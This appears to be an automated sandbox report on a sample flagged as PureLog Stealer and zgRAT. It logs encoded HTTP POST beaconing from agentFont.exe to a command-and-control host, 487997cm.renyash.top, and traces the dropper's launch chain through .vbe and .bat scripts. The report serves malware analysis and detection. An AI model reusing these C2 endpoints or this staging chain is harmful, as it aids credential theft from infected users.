                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:29:02.540538073 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:02.670094967 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:59 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  136 | 192.168.2.4 | 50139 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:29:02.021928072 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:29:02.657104969 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:02.785334110 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:59 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  137 | 192.168.2.4 | 50140 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:29:02.914294958 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:29:03.552181005 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:03.682168961 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:29:00 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  138 | 192.168.2.4 | 50141 | 185.158.202.52 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:29:03.803205013 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:29:04.440031052 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:04.570213079 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:29:01 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  139 | 192.168.2.4 | 50142 | 185.158.202.52 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:29:04.695296049 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:29:05.341133118 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:05.471816063 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:29:01 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  140 | 192.168.2.4 | 50143 | 185.158.202.52 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:29:05.606247902 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:29:06.243604898 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:06.373976946 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:29:02 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  141 | 192.168.2.4 | 50144 | 185.158.202.52 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:29:06.503803968 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:29:07.150788069 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:07.279824972 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:29:03 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  142 | 192.168.2.4 | 50145 | 185.158.202.52 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:29:07.410274029 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  143 | 192.168.2.4 | 50146 | 185.158.202.52 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:29:07.681133986 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:29:08.034130096 CET | 1340 | OUT | Data Raw: 51 51 58 5b 54 4b 50 59 59 5f 5b 52 5a 5d 59 55 55 57 54 50 51 5c 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QQX[TKPYY_[RZ]YUUWTPQ\[Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.[(2541>"-=/T2Y&\':^653-V+' 5[5\?&X"#\.
                                                                                  Jan 1, 2025 11:29:08.317962885 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:08.446157932 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:29:04 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 02 1a 24 00 28 36 2f 1f 25 2b 26 09 30 58 23 12 3f 0d 0c 11 2c 05 39 5a 26 3a 05 03 28 20 2f 18 3f 3b 29 04 3f 03 06 58 25 1c 30 57 25 0f 2a 51 00 1c 23 1e 28 38 28 06 2a 2b 2a 1c 29 08 2b 5f 28 02 34 02 36 29 27 1c 24 5d 35 0f 30 3d 27 11 28 59 2c 55 2f 36 28 07 2c 0d 2f 13 26 36 2f 52 09 14 21 12 29 55 34 0d 32 22 3e 5a 27 20 05 5d 22 3b 33 54 23 22 35 1f 23 0a 3b 5b 3f 3d 11 5f 21 31 00 59 26 2f 3d 18 3e 2e 2b 50 35 3e 23 54 2c 03 23 56 0f 36 5d 51
                                                                                  Data Ascii: $(6/%+&0X#?,9Z&:( /?;)?X%0W%*Q#(8(*+*)+_(46)'$]50='(Y,U/6(,/&6/R!)U42">Z' ]";3T#"5#;[?=_!1Y&/=>.+P5>#T,#V6]Q


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  144 | 192.168.2.4 | 50147 | 185.158.202.52 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:29:07.802774906 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:29:08.159236908 CET | 1044 | OUT | Data Raw: 51 55 58 5e 54 44 50 5a 59 5f 5b 52 5a 5f 59 53 55 53 54 58 51 58 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QUX^TDPZY_[RZ_YSUSTXQX[Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.\("=4 X%.&:=7$,.',965)3<=S*$^"><:&X"#\.<
                                                                                  Jan 1, 2025 11:29:08.448710918 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:08.583746910 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:29:05 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  145 | 192.168.2.4 | 50148 | 185.158.202.52 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:29:08.705621958 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:29:09.049830914 CET | 1044 | OUT | Data Raw: 51 52 5d 58 54 43 55 58 59 5f 5b 52 5a 5b 59 53 55 5f 54 5e 51 58 5b 58 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QR]XTCUXY_[RZ[YSU_T^QX[X^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.Z("-W7>+&"D:=#1&39!&1'=W*'8""+&X"#\.,
                                                                                  Jan 1, 2025 11:29:09.343269110 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:09.470130920 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:29:05 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  146 | 192.168.2.4 | 50149 | 185.158.202.52 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:29:09.598582029 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:29:09.956010103 CET | 1040 | OUT | Data Raw: 54 5b 58 5c 54 41 50 5c 59 5f 5b 52 5a 5a 59 5c 55 5f 54 5a 51 50 5b 5f 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: T[X\TAP\Y_[RZZY\U_TZQP[_^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.Z+*#X2=6B.-$&<"\'&#5U%<2*';]!)+:&X"#\.
                                                                                  Jan 1, 2025 11:29:10.235394001 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:10.362190008 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:29:06 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  147 | 192.168.2.4 | 50150 | 185.158.202.52 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:29:10.487360954 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:29:10.849827051 CET | 1044 | OUT | Data Raw: 54 55 58 58 54 45 50 5a 59 5f 5b 52 5a 5f 59 52 55 56 54 59 51 50 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TUXXTEPZY_[RZ_YRUVTYQP[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-("5V#-&6D:=/U&:'&Y!:'/&>4]6.&)*&X"#\.<
                                                                                  Jan 1, 2025 11:29:11.128770113 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:11.258151054 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:29:07 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  148 | 192.168.2.4 | 50151 | 185.158.202.52 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:29:11.379162073 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:29:11.737207890 CET | 1044 | OUT | Data Raw: 54 5b 58 58 54 47 50 5d 59 5f 5b 52 5a 52 59 57 55 51 54 5b 51 5e 5b 59 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: T[XXTGP]Y_[RZRYWUQT[Q^[Y^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.<2& .#&>5:#%/*3:X!=3Y)P=B#_!><:&X"#\.
                                                                                  Jan 1, 2025 11:29:12.024661064 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:12.155803919 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:29:08 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  149 | 192.168.2.4 | 50152 | 185.158.202.52 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:29:12.282274961 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:29:12.627857924 CET | 1044 | OUT | Data Raw: 51 57 5d 52 54 4b 55 59 59 5f 5b 52 5a 58 59 54 55 52 54 58 51 58 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QW]RTKUYY_[RZXYTURTXQX[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-(1= -<%.6:[+S1/%$Z*X!1T3Q)43_":<*&X"#\.
                                                                                  Jan 1, 2025 11:29:12.928555012 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:13.060053110 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:29:09 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Target ID:0
                                                                                  Start time:05:26:57
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Users\user\Desktop\QH67JSdZWl.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Users\user\Desktop\QH67JSdZWl.exe"
                                                                                  Imagebase:0x7ff7b8ef0000
                                                                                  File size:1'898'695 bytes
                                                                                  MD5 hash:C8228B107DFAD48C1A7DE8147FA1F6E4
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1663870017.0000025FF5CAA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:1
                                                                                  Start time:05:26:57
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe"
                                                                                  Imagebase:0x720000
                                                                                  File size:3'568'371 bytes
                                                                                  MD5 hash:FEB773E3FB046E0D1F39450C703492CA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000003.1669628043.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000003.1668966554.00000000065A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 83%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:2
                                                                                  Start time:05:26:58
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\mshypercomponentSavesdll\kNSe5xQ3wI9ft6pWJZ9EeFYPDfgbdbVMsQk13JHxpBJ7xdPC40.vbe"
                                                                                  Imagebase:0xf30000
                                                                                  File size:147'456 bytes
                                                                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:05:26:59
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\mshypercomponentSavesdll\1fgSUpJ8Uk5BF.bat" "
                                                                                  Imagebase:0x240000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:05:26:59
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:5
                                                                                  Start time:05:26:59
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\mshypercomponentSavesdll/agentFont.exe"
                                                                                  Imagebase:0xf30000
                                                                                  File size:3'284'992 bytes
                                                                                  MD5 hash:0D30B2D3FD8DB7AE5EDC0455DA8DC8E9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
